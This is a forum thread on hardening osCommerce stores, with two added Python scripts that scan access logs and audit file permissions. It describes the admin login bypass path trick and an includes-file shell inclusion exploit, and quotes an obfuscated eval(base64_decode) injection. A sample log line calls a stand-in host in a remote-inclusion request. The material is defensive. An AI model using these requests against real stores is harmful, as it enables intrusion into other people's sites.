FWR Media Posted December 23, 2010

Quoting Loic: "Hello, thank you for this add-on. I would like to know if this contribution works fine with your rewriting contribution. Regards, Loic"

This thread isn't an add-on; it's a general information thread about how to secure osCommerce 2.2.

Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls | KissMT Dynamic SEO Meta & Canonical Header Tags | KissER Error Handling and Debugging | KissIT Image Thumbnailer | Security Pro - Querystring protection against hackers (a KISS contribution). If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work.
qkzoo Posted January 7, 2011 Posted January 7, 2011 I would like to add htaccess protection as recommended, but am not sure even where to begin. The only thing I do understand is to change the items listed in red, to my specific data. Where is this htaccess file, and do I just basically copy everything in this "htaccess_protection.htm" to this file? Thanks for any help, Andy
Guest Posted January 10, 2011

Andy, you're obviously looking at the htaccess contribution and can see the many scripts written within it. Use your FTP client to look at the files for osCommerce. You SHOULD see an .htaccess file in the root [catalog] directory, as osCommerce comes with one. You can add the scripts that work for you from the contribution. NOT ALL WILL WORK. So, if you add them one at a time, test the site and then add the next, that is the best approach.

TIP: Some hosting providers HIDE the .htaccess from view over FTP. So if you cannot see one, or have created a new one and uploaded it to your hosting provider and STILL cannot see it, then you will have to use your hosting provider's cPanel File Manager to access and edit the file.

Chris
qkzoo Posted January 11, 2011 Hey, there was a tip for protection against "ANTI Cross Site Scripting attacks" using .htaccess code. The instructions for the code said "only 10 lines to add to your htaccess file." Which .htaccess file should I add these codes to? I have a bunch of .htaccess files in different directories throughout my entire site. Should I put it in my catalog directory, or even deeper below my public_html directory? Thanks, Andy
qkzoo Posted January 12, 2011 Posted January 12, 2011 Is there a reliable website that will "test" your security?
renatoronner Posted January 12, 2011 https://cdbrasil.com.br/ Haha, I removed the images and everything is great, but I need to put images back :((( Please help me, people :(
bitwit Posted January 22, 2011 I've noticed that after I browse around my store as 'guest' and then let my browser sit untouched for about 30 minutes on any page, I can get access to 'admin' just by typing in the admin URL like 'http://www.mysite.com/catalog/admin/' (of course I changed the name). This seems to give full access to admin functions until I hit 'logout'; again, if I browse the site for a few minutes, let it sit, then again I get 'admin' access after 'logout' without logging in again. Both htaccess and htpasswd are in place as recommended. Has anyone else noticed this?
bitwit Posted January 22, 2011

Quoting myself: "noticed that after I go browse around my store as 'guest' and then let my browser sit untouched for about 30 minutes on any page I can get access to 'admin' just by typing in the admin URL like 'http://www.mysite.com/catalog/admin/'"

I have commented out the lines that make up this segment:

// try to automatically login with the HTTP Authentication values if it exists...
...
...

in the file catalog/admin/includes/application_top.php around line 165. This seems to have cured it; I have tried twice in the last hour to gain admin access as before but am getting redirected to the admin login now.

btw: osC v2.3.1
FIMBLE Posted January 29, 2011 By following the security measures in this post, adding htaccess protection to your admin, and renaming your admin, you will protect yourself from this; in fact just renaming your admin would do it. But the more protection you have the better. Nic. Sometimes you're the dog and sometimes the lamp post. My Contributions
bitwit Posted January 30, 2011

Quoting Nic: "By following the security measures in this post, adding htaccess protection to your admin, and renaming your admin you will protect yourself from this, in fact just renaming your admin would do it. But the more protection you have the better."

Hi, renaming 'admin' was one of the first things I did during install; I'm using the name 'admin' here so readers know what I'm referring to. Commenting out the section mentioned stopped it immediately. Granted, one would have to know the admin folder's real name to exploit this, but obscurity is no replacement for security.
FIMBLE Posted January 31, 2011

Quoting bitwit: "granted, one would have to know the admin folder real name to exploit this but obscurity is no replacement for security."

I do not believe I was suggesting that, but what it does do is immediately remove the threat of that script; in the meantime security measures can be taken to help prevent attacks on the admin. As we all know, renaming the folder will in no way hide it from snoopers and it will not take long to find it either, so it had to be part of a holistic solution, not a standalone measure. Sometimes you're the dog and sometimes the lamp post. My Contributions
pikeymr Posted February 3, 2011 Posted February 3, 2011 Just found this thread. I had most of these security measures in place for a long time: renaming the admin, password protection, etc. When I check Who's Online I still see things like this- /catalog/index.php/admin/file_manager.php/login.php My question is- they're not actually harming anything, are they? I mean, my 'admin' is named something else, is password protected, and file_manager.php doesn't exist. Anything to worry about here? Thanks
Follkes Posted February 3, 2011 Posted February 3, 2011 They are trying to break in, but if you have admin folder renamed they only hit a wall. Ban those IP, and erase file_manager...
pac_indahood Posted February 8, 2011 Hello, I did all the security things, but I still have 2 problems: 1) on my server, strange files like this periodically appear: c145688d97d79801101b48b667862943 (without extension); 2) in Webmaster Tools, under keywords, I have strange words like viagra. I don't sell things like this! My site is still hacked. Please help me. Thanks
PJ2006 Posted February 9, 2011 Can anyone recommend a good cheap hosting service in the UK? Fasthost looks good.

I use Webhosting UK - generally they are pretty good.
Taipo Posted February 9, 2011

The thing that bothers me about many of the security contributions for osCommerce is that they are often stab-in-the-dark code that does not directly address the types of attacks users are experiencing. For example, there have been at least two regular methods of gaining access to files. One is via the admin folder and the other is a slightly more difficult method of injecting straight into the database. The admin method has hardly been addressed in any of the add-ons I have seen to date, yet there are dozens of them.

In admin/includes/application_top.php, on the line after:

// Include application configuration parameters
require('includes/configure.php');

add:

if (stristr($_SERVER['REQUEST_URI'], '.php/login')) {
  die();
}

This will put a serious dent in using the /admin/categories.php/login.php trick to get a look into your admin area.

The rest is as others have already stated, if you have already been hacked:

1/ Clean out all the other admins that attackers have registered in your admin area previously.

2/ Clean out all the PHP files in the images folder (and subfolders).

3/ Make sure every other folder, other than the images folder, is chmodded to 755.

4/ Have a look in all files that previously had 666 permissions; for instance, sometimes includes/header.php or .htaccess is writeable. Change those to 644. In particular, look for added code in these files that looks like:

eval(base64_decode("DQppZiAoIWZ1bmN0aW9uX2V4aXN....

I have not looked all the way through osCommerce but I doubt there is any use for eval() at all in this application.
5/ In the main includes folder add the following .htaccess file:

Options All -Indexes
<Files *.php>
Order Deny,Allow
## Deny from all
RewriteEngine On
RewriteRule .* http://www.yourmaindomainname.com [R,L]
</Files>

(obviously change http://www.yourmaindomainname.com to your domain name)

This takes care of that 'other' exploit that has never been patched (/includes/classes/actions.php?module=[sHeLL]) by redirecting anyone trying to directly access files within the includes folder and its subfolders.

6/ Change the user and password for your MySQL database. If you have been hacked in the past then there is a high chance that the attackers have uploaded some shell code to your site, giving them access to at least read files in osCommerce. That means they could quite easily read the configure.php file in /includes/. Usually cPanel web hosts auto-configure your username and password to be the same as the MySQL username and password with a few minor changes, so it's not difficult to back-engineer what the cPanel login would be if an attacker got their hands on your configure.php file.

7/ Add .htaccess restrictions to your admin folder.

Hope this helps.

- Stop osCommerce hacks dead in their tracks with osC_Sec (see discussion here) - Another discussion about infected files ::here:: - A discussion on file permissions ::here:: - Site hacked? Should you upgrade or not, some thoughts ::here:: - Fix the admin login bypass exploit here - Pareto Security: New security add-on I am developing, a remake of osC_Sec in PHP 5 with a number of fixes - BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
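The two request shapes Taipo describes, the /admin/<script>.php/login.php trick and direct hits on scripts under /includes/, show up plainly in the web server's access log. The following is an added example, not code from this thread or from osCommerce, written in Python: it parses Apache combined-format log lines (the sample lines are constructed) and flags both patterns. It decodes the path before testing it, because $_SERVER['REQUEST_URI'] carries the raw request URI while Apache decodes the path before mapping it to a file, so a request for orders%2Ephp/login.php still reaches orders.php with PATH_INFO but would slip past a plain stristr on '.php/login'. The basename helper shows the mechanism behind the trick as generally understood: PHP_SELF includes PATH_INFO, so an auth check that compares basename($PHP_SELF) with 'login.php' sees the trailing login.php rather than the script that is actually running. The IP addresses, timestamps and paths in SAMPLE_LOG are invented for the example.

```python
"""Spot the osCommerce admin-bypass and includes-direct-access request shapes
in Apache access-log lines. Added example; not osCommerce or thread code."""
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [09/Feb/2011:10:01:02 +0000] "GET /catalog/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Feb/2011:10:01:09 +0000] "GET /catalog/admin/categories.php/login.php HTTP/1.1" 200 8842 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Feb/2011:10:02:33 +0000] "GET /catalog/index.php/admin/file_manager.php/login.php HTTP/1.1" 404 221 "-" "libwww-perl/5.8"
198.51.100.7 - - [09/Feb/2011:10:02:41 +0000] "GET /catalog/includes/classes/actions.php?module=http%3A%2F%2Fevil.example%2Fs.txt HTTP/1.1" 200 0 "-" "libwww-perl/5.8"
198.51.100.7 - - [09/Feb/2011:10:02:50 +0000] "GET /catalog/admin/orders%2Ephp/login.php HTTP/1.1" 200 9001 "-" "libwww-perl/5.8"
192.0.2.9 - - [09/Feb/2011:10:03:00 +0000] "GET /catalog/admin/login.php HTTP/1.1" 200 1208 "-" "Mozilla/5.0"
"""

# Apache combined log: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def php_self_basename(path):
    """What basename($PHP_SELF) yields for a request path: PHP_SELF is the script
    name plus PATH_INFO, so /admin/categories.php/login.php gives 'login.php'."""
    return path.rsplit('/', 1)[-1]


def is_admin_bypass(path):
    """A .php script followed by extra path info that names login.php.
    Mirrors the stristr($_SERVER['REQUEST_URI'], '.php/login') test, but on the
    decoded path so a percent-encoded dot or slash cannot slip past it."""
    return '.php/login' in unquote(path).lower()


def is_includes_direct(path):
    """Direct browser request for a script under /includes/; those files are
    only meant to be require()d by other scripts (the actions.php?module= case)."""
    decoded = unquote(path).lower()
    return '/includes/' in decoded and decoded.endswith('.php')


def scan_access_log(text):
    """Return (ip, status, path, reasons) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m['target']).path   # drop the query string
        reasons = []
        if is_admin_bypass(path):
            reasons.append('admin-login-bypass')
        if is_includes_direct(path):
            reasons.append('includes-direct-access')
        if reasons:
            hits.append((m['ip'], int(m['status']), path, tuple(reasons)))
    return hits


def suspicious_ips(text):
    """Per-address hit counts: the list to feed into a ban rule."""
    return dict(Counter(ip for ip, *_ in scan_access_log(text)))


if __name__ == '__main__':
    for ip, status, path, reasons in scan_access_log(SAMPLE_LOG):
        print(f'{ip:<14} {status} {path} {",".join(reasons)}')
    print(suspicious_ips(SAMPLE_LOG))
```

The status column answers pikeymr's question above: a 404 or 403 on one of these probes means it hit a wall, while a 200 on a path under your real admin name is what needs looking at.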
pdcelec Posted February 9, 2011 Quoting: "I use Webhosting UK - generally they are pretty good." eukhost have been good to me.
kenkja Posted February 19, 2011

Hello All, long time no speak. I finally got round to osCommerce. I have installed version 2.3.1 and have been reading through all 29 pages of this post and various others to decide what security I need to do, so do I have this correct:

1. Upload Security Pro & add code to includes/application_top.php
2. Change all the permissions to 644 for files (or 444 for the 2 x configure.php if the server will take it) & 755 for folders
3. Rename the admin folder
4. Password protect the renamed admin folder

Do I need to delete the define_language.php file and, if so, are there any lines of code which need removing as a result of its deletion?

osCommerce v2.3.3, Security Pro v11, Site Monitor, IP Trap, htaccess Protection, Bad Behaviour Block, Year Make Model, Document Manager, X Sell, Star Product, Modular Front Page, Modular Header Tags
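Taipo's clean-up steps 2 to 4 and the permission rules in Ken's list can be checked mechanically rather than by eye. The following is an added example, not code from this thread or from osCommerce, written in Python: it builds a small constructed catalog tree in a temporary directory that reproduces the symptoms described in the thread (a 666 includes/header.php containing eval(base64_decode(...)), a writable .htaccess, a 777 folder, an extensionless file dropped into images/, a configure.php that is not yet 444) and audits it. The admin folder name 'admin', the 644/755 rules and the 444 target for configure.php are taken from the thread; the image extension list, the 1 MB content-scan limit and the harmless base64 marker in the sample header.php are this example's own choices.

```python
"""Audit an osCommerce catalog tree for the permission rules and compromise
indicators listed in this thread. Added example; not osCommerce or thread code."""
import os
import re
import shutil
import stat
import tempfile

DIR_MODE = 0o755                                  # thread: folders 755
IMAGE_EXT = ('.gif', '.jpg', '.jpeg', '.png')     # assumption: what belongs in images/
# Files the thread says should end up read-only (444); the admin dir name is assumed.
CONFIG_FILES = ('includes/configure.php', 'admin/includes/configure.php')
# The eval(base64_decode( family of injected code Taipo describes.
OBFUSCATED_EVAL = re.compile(
    rb'eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(', re.I)
SCAN_LIMIT = 1_000_000                            # skip huge files when grepping


def audit_site(root):
    """Return sorted (kind, relative_path) findings for a catalog tree."""
    findings = set()
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, '/')
        if stat.S_IMODE(os.stat(dirpath).st_mode) != DIR_MODE:
            findings.add(('dir-not-755', rel_dir))
        for name in files:
            full = os.path.join(dirpath, name)
            rel = name if rel_dir == '.' else f'{rel_dir}/{name}'
            mode = stat.S_IMODE(os.stat(full).st_mode)
            if mode & 0o022:                      # group/world writable, e.g. 666
                findings.add(('group-or-world-writable', rel))
            if rel in CONFIG_FILES and mode & 0o200:
                findings.add(('configure-not-444', rel))
            if rel.startswith('images/') and not name.lower().endswith(IMAGE_EXT):
                findings.add(('non-image-in-images', rel))
            if os.path.getsize(full) < SCAN_LIMIT:
                with open(full, 'rb') as fh:
                    if OBFUSCATED_EVAL.search(fh.read()):
                        findings.add(('obfuscated-eval', rel))
    return sorted(findings)


def build_sample_site():
    """Constructed tree reproducing the symptoms described in the thread."""
    root = tempfile.mkdtemp(prefix='osc_audit_')
    os.chmod(root, DIR_MODE)
    layout = {
        'index.php': (0o644, b'<?php require("includes/application_top.php");'),
        '.htaccess': (0o666, b'Options -Indexes\n'),
        'includes/configure.php': (0o644, b"<?php define('DB_SERVER_PASSWORD', 'secret');"),
        # constructed marker; decodes to 'hello', not to anything executable
        'includes/header.php': (0o666, b'<?php eval(base64_decode("aGVsbG8="));'),
        'images/logo.gif': (0o644, b'GIF89a'),
        'images/c145688d97d79801101b48b667862943': (0o644, b'<?php // dropped file'),
        'admin/login.php': (0o644, b'<?php // admin login'),
    }
    for rel, (mode, body) in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'wb') as fh:
            fh.write(body)
        os.chmod(full, mode)
    for sub in ('includes', 'images'):
        os.chmod(os.path.join(root, sub), DIR_MODE)
    os.chmod(os.path.join(root, 'admin'), 0o777)  # the one wrongly permissioned folder
    return root


def cleanup(root):
    shutil.rmtree(root)


if __name__ == '__main__':
    site = build_sample_site()
    for kind, path in audit_site(site):
        print(f'{kind:<24} {path}')
    cleanup(site)
```

Run it against a real catalog with audit_site('/path/to/catalog'); every finding maps to one of the thread's steps, and a clean run is what "all the security things" should look like before looking elsewhere for the reinfection route.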
geoffreywalton Posted February 20, 2011 Ken, you could have saved yourself some time. Everything you need to do is in the first post in this thread and the links in there. So slightly more than you have listed above. HTH, G. Need help installing add-ons/contributions, cleaning a hacked site or a bespoke development? Check my profile. Virus Threat Scanner. My Contributions. Basic install answers. Click here for Contributions / Add Ons. UK your site. Site Move. Basic design info. For links mentioned in old answers that are no longer here follow this link: Useful Threads.
kenkja Posted February 20, 2011 Hello G, that's life, I guess; maybe I've read too much & can't see the wood for the trees, but I've gained the impression that some of the security issues have been resolved in 2.3.1. For sure I can't find file_manager.php in the admin folder. Ken. osCommerce v2.3.3, Security Pro v11, Site Monitor, IP Trap, htaccess Protection, Bad Behaviour Block, Year Make Model, Document Manager, X Sell, Star Product, Modular Front Page, Modular Header Tags
Juto Posted February 20, 2011

Hello, I thought I'd share this with you. It's simple but strong. If you have FTP access to your site, in the root folder's .htaccess add:

#Instead of showing access denied redirect to index.php
#ErrorDocument 403 /access_error.php?id=403
#Like so
ErrorDocument 403 /index.php?id=403
#Below add (use your renamed admin)
RewriteRule ^admin\/?$ - [F]

In the admin folder add this to your .htaccess:

# check admissible IP-address
# Protect files and directories from prying eyes.
<FilesMatch "...">
Order deny,allow
Deny from all
# allow your ip address:
allow from 12.34.56.78
</FilesMatch>

NB: This means that you have to edit the above before you can access admin.

Sara. Contributions: http://addons.oscommerce.com/info/8010 http://addons.oscommerce.com/info/8204 http://addons.oscommerce.com/info/8681